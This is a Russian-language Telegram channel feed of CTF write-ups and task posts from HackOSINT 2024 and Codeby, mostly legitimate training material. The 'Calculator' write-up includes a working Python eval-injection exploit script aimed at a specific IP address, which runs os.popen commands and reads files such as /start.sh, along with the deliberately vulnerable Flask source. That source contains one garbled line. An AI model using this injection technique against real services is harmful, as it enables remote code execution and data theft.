#crypto

HackOSINT
Бонусный трек

Билибизяка от @Max_RSC
Ссылка на задание

Сомневаюсь, что у кого-нибудь возникли трудности с первым этапом — это простейшее декодирование из binary. Инструмент Кибершеф, который для решения этого таска рекомендовали сами организаторы, автоматически определяет данную кодировку и любезно предлагает декодировать текст. Насколько я знаю, у большинства возникли трудности именно со вторым этапом.

Итак, после преобразования из binary мы получили непонятные 24 числа. Здесь надо применить рецепт From Float. Обратимся к документации Кибершефа и узнаем, какое преобразование производит этот рецепт:

Convert from IEEE754 Floating Point Numbers

IEEE754 — это стандарт, описывающий формат представления чисел с плавающей точкой. Используется, например, в компиляторах различных языков программирования.

Применяем рецепт From Float. Результат, который мы получили, не очень воодушевляет, но мы видим, что Кибершеф сразу подсказывает нам следующее преобразование: надо применить рецепт Gunzip. Делаем это и получаем строку в hex-нотации, которую Кибершеф снова предлагает нам декодировать, поначалу применив рецепт From Hex, а затем Url Decode. Так мы приходим к финальной строке, которая представляет собой стимовский урл:

иди решай задачу, не жульничай!

Идем по ссылке и находим флаг в имени юзера.

Кстати, кому-нибудь интересно, как выполнить преобразование From Float средствами Python? Если интересно, напишите об этом в комментариях — расскажу.

#HackOSINT2024

#WEB
HackOSINT
Задание "Калькилятор" от t.me/the_tigor
Ссылка на задание

Пробуем запихнуть что-нибудь эдакое и видим в devtools браузера заголовок Debug, в котором лежит регулярка !~(^(-\d|\d).*\d$|^\d$)

Пробуем 0+int("1")+0, получаем 1.0, похоже там python eval, вполне ожидаемо, остается придумать как это эксплуатировать

Доставать результаты будем так 0+int.from_bytes("str".encode(),'big')+0, обратно конвертируем беря число и (7566450).to_bytes(6, 'big'). Если брать больше 6 байт, получается запись в scientific notation, можно конечно упаковать компактнее, но и так сойдет

Пробуем пропихнуть __import__("os").popen, но не проходит, выясняем что дело в __. Но как быть? Оказывается import os написали уже за нас и можно дернуть os.popen("ls")

Узнаем что флаг валяется рядом и вытаскиваем его по частям, пропихивая свой пейлоад между суммой нулей и конвертируя в число куски по 6 байтов

Флаг ищи сам, хитрюшка!

Заодно вытащили app.py но там ничего интересного. Забанены не только __, но и r'.*?([sS][yY][sS][tT][eE][mM]|[sS][hH]|[rR][mM]|[eE][xX][eE][cC]|__).*?' Почему автор таска не юзал re.I вопрос открытый)

from flask import Flask, render_template_string, request, Response
import re
import os

app = Flask(__name__)

html = '''<!DOCTYPE html>
<html>
<head>
    <title>Silly Calculator</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
   text-align: center;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            flex-direction: column;
   background-color: lightblue; /* Глупый цвет фона */
        }
        h1 {
            font-size: 5em;
        }
        input {
            width: 200px;
            height: 30px;
            font-size: 1.5em;
        }
    </style>
</head>
<body>

<h1>Silly Calculator</h1>
<div>
    <form method="GET">
  <input style="width:10em;margin:.5em" type="text" name="statement">
  <input value="=" style="width: 2em; margin:.5em" type="submit">
 </form>
 <h2>%s</h2>
</div>

</body>
</html>'''

@app.route("/", methods=['GET'])
def hello_world():
    statement = request.args.get('statement')
    if statement:
        if re.match(r'.*?([sS][yY][sS][tT][eE][mM]|[sS][hH]|[rR][mM]|[eE][xX][eE][cC]|__).*?', statement): 
            answer = 'invalid input'
            debug = 'Input Filtered'
            resp = Response(html % answer)
            resp.headers["Debug"] = debug
            return resp 
        elif not re.match(r'(^(-\d|\d).*\d$|^\d$)', statement): 
            answer = 'invalid input'
            debug = '!~(^(-\d|\d).*\d$|^\d$)'
            resp = Response(html % answer)
            resp.headers["Debug"] = debug
            return resp 
        else:
            try:
                answer = eval(statement)
                answer = float(answer)
                resp = Response(html % answer)
                resp.headers["Debug"] = answer
                return resp
            except Exception as e:
                answer = 'invalid input'
                debug = e
                resp = Response(html % answer)
                resp.headers["Debug"] = debug
                return resp
    else:
        resp = Response(html % '')
        return resp 

ifdebug = '!== '__main__':
    app.run(host='127.0.0.1', port=5000)
    pass

import requests
from bs4 import BeautifulSoup
from urllib.parse import quote
import time


def exec(command, count=1024):
    for i in range(count):
        time.sleep(1)

        statement = f"0+int.from_bytes({command}[{str(i*6)}:{str(i*6+6)}],'big')+0"
        url = f'http://91.200.84.50/?statement={quote(statement)}'
        req = requests.get(url)

        soup = BeautifulSoup(req.text)
        data = soup.find('h2').text
        num = int(data.split(".")[0])

        if num == 0:
            return

        print(num.to_bytes(6, 'big').decode('utf-8'), end="")


# exec("open('/start.sh', 'rb').read()")
# exec("os.popen('ls /').read().encode()")
# exec("os.popen('touch t').read().encode()")

#HackOSINT2024

Завтра будет много райтапов, а пока разыграю значок за лучший райтапчик по HackOSINT!

Ну и немножко USDT

Присылайте!

@Schwarz_Osint_contact @CyberFazaN, вы в курсе, что это был один из лучших CTF BEST EVER?

Лайк если согласен

Привет мои дорогие кибер-котлетки

Сегодня был очень жесткий и тяжелый день как морально, так и физически.

Не успел сегодня опубликовать. Завтра исправлюсь, обещаю

Мне прислали множество интересных отчетов. Нужно их чуть обработать, чтобы никакого читерства и флажок вы добывали сами!

Всем хорошей пятницы!

#разное #codeby
Великий математик от @while_not_False (пацана знаю лично, просто настоящая кибер-котлета для своих лет!)
Ссылка на задание

from pwn import remote
import re

print('\033[31m')
host = "62.173.140.174"
port = 10360


def solve_equation(equation):
    pattern = r'\((.*?)\)\s*(\w+)\s*([\+\-\*\/])\s*(\w+)\s*=\s*(-?\d+)'
    match = re.match(pattern, equation)
    if match:
        x = match.group(2)  # значение после скобок и до оператора
        op = match.group(3)  # оператор
        y = match.group(4)  # значение после оператора и до знака равенства
        z = int(match.group(5))  # значение после знака равенства

        # Пробуем привести x и y к целому числу, если не получится - оставляем как строку
        try:
            x = int(x)
        except:
            pass
        try:
            y = int(y)
        except:
            pass

        if isinstance(x, str):
            if op == '+':
                result = z - y
            elif op == '-':
                result = z + y
            elif op == '*':
                result = z // y
            elif op == '/':
                result = z * y
            else:
                return None
        elif isinstance(y, str):
            if op == '+':
                result = z - x
            elif op == '-':
                result = x - z
            elif op == '*':
                result = z // x
            elif op == '/':
                result = x // z
            else:
                return None
        else:
            return None
        return result
    else:
        return None


def main():
    conn = remote(host, port)
    for _ in range(8):
        print(conn.recvline().decode())
    conn.sendline('start')
    for _ in range(3):
        print(conn.recvline().decode())
    while True:
        conn.recvline().decode()
        equation = conn.recvline().decode().strip()
        if "FLAG" in equation:
            print('\033[31m' + f"\n\n{equation}")
            break
        print('\033[32m' + f"{equation}")
        print(conn.recvline().decode())
        solution = solve_equation(equation)
        if solution is not None:
            print('\033[33m' + ">>> " + '\033[34m' + f"{solution}")
            conn.sendline(str(solution))
        else:
            print("Error")
            break
    conn.close()


if __name__ == "__main__":
    main()

#codebygames

#crypto
Тык-тык от @Max_RSC

Кратко: решетка Кардано. Зная формат флага (первые шесть символов ключа), можно расшифровать флаг без знания ключа.

Посмотрим на таблицу замен:

6 > $     
7 > {
8 > _
9 > }

Выполняем преобразование в соответствии с таблицей замен:

RB_01BWWD{NH_}U4_T$T14{__04W_0G04}WW

Обратимся к подсказке: "Что-то с дырками и крутится". Сразу приходит на ум решетка Кардано.

Немного истории. Решетка Кардано — исторически первая известная шифровальная решетка. Этот метод шифрования был изобретен в XVI веке итальянским математиком и инженером Джероламо Кардано. Кстати, именно он впервые описал карданный вал, названный в его честь.

Метод шифрования, который предложил Джероламо Кардано, можно отнести к классу перестановочных шифров. Задачки, в которых фигурирует решетка Кардано, мы еще не раз встретим на различных CTF.

Для решения таска воспользуемся сервисом:

https://merri.cx/enigmator/cipher/grille.html

Указываем формат решетки (Grille Size). Поскольку длина шифртекста составляет 36 символов, нетрудно догадаться, что формат решетки — 6x6.

Вводим шифртекст в строку Cipher Text. Вводим ключ в строку Grille. Напомню, мы знаем первые шесть символов ключа — B0NU${. Нажимаем Decrypt.

# здесь должна быть картинка, прикрепленная к посту

Флаг пока нечитаем. Неудивительно, ведь мы указали всего 6 символов ключа. Какова длина ключа? Очевидно, что это число, на которое 36 делится без остатка – 9 и нам осталось подобрать 3 символа.

На четвертой строке сразу после символа '{' идет символ '_', при этом два раза подряд, но флаг не может начинаться с символа '_', поэтому исключаем первые две клетки. На шестой строке расположился символ '}' — исключаем эту клетку, потому что именно фигурной скобкой заканчивается флаг.

Осталось 9 символов, из которых нужно выбрать 3. Попробуем составить осмысленные слова из символов, которые нам доступны. Единственное, что приходит в голову — это W0W. В CTF с этого междометия нередко начинаются флаги. Сделаем предположение, что первое слово флага — это W0W. W0W можно составить всего двумя способами, один из которых сразу отобразит флаг.

#HackOSINT2024

Ребята все остальные кто присылал мне отчёты с райтапами. Не переживайте, я ваши обязательно выложу и процитирую, только позже

Приехал мерч!
Вручу на награждении 05.07!

#linuxadministration
Rûnar munt þû finna

Ты попал на удаленный сервер под пользователем user. Известно, что флаг, за которым ты пришел на систему, находится по пути /home/user/secret.txt. Твоя задача — просто прочитать этот файл. Однако возникла проблема: команды cat, awk, find, grep, echo, more, less, head, tail, sort, uniq, nano, vi/vim, strings, xxd, ftp, ssh, python, perl, chmod, nc, base64 и многие другие команды терминала не работают. Кроме того, sudo также недоступен. Твои действия?

Хинт: Некоторые команды, тем не менее, работают корректно. 

Автор: @Max_RSC

Upd. Развернули задачку у наших друзей TaipanByte CTF:

https://ctf.taipanbyte.ru/challenges#Escape-286

Благодарим @FaLLenSkiLL